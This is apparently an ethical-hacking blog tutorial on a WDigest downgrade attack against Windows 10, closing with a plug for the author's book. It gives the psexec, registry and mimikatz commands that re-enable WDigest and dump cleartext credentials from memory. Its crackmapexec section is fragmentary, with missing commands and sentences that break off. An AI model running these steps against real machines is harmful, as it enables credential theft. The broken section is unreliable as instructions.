By default wdigest is disabled on Windows 10, but not removed. You can enable it with a registry change. This is a short and sweet tutorial on how to dump Windows passwords by exploiting wdigest in a wdigest downgrade attack. I demonstrate how to exploit the challenge-response protocol wdigest to extract cleartext credentials through mimikatz and by using the crackmapexec module.
The attack involves making a registry change to the WDigest setting in the local group policy settings on the target. From an attacker perspective making an unauthorized registry change requires local admin permissions on the target.
As a local administrator I am going to make one little registry change to make this attack possible.
I am going to use this command to add the registry key 1 to the Windows registry for wdigestThen I use mimikatz for this simple example.
Here are the steps to exploit wdigest to dump user credentials from memory:
- Open a shell on the BEHWIN10 target using Impacket’s psexec.py (must be admin level creds).
python3 psexec.py {user}:{pass}@target - Use this command to edit the registry key that disables wdigest by default on Windows 10:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 - Logon as a new user, here I am using wa-kennyp.
- With your shell still open run
sekurlsa::wdigest after using
mimikatz to start Mimikatz.
Using Crackmapexec To Exploit Wdigest
First if you don't know how to install the crackmapexec Docker image, do that. It is so much easier than trying to install from source or using one of the releases, because of the many dependencies. Check the wiki to see all the options.
Once you have installed Docker on Kali Linux, then pull the crackmapexec image from Docker Hub,
Now start a new container from the newly acquired image.
docker inspect crackmapexec
. The second field is the path where the file or directory are mounted in the container. Finally the byt3bl33d3r/crackmapexec is the image name. In other words,
You may know that crackmapexec has modules built-in for various tasks. You can list the possible options using
Finally move to the
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.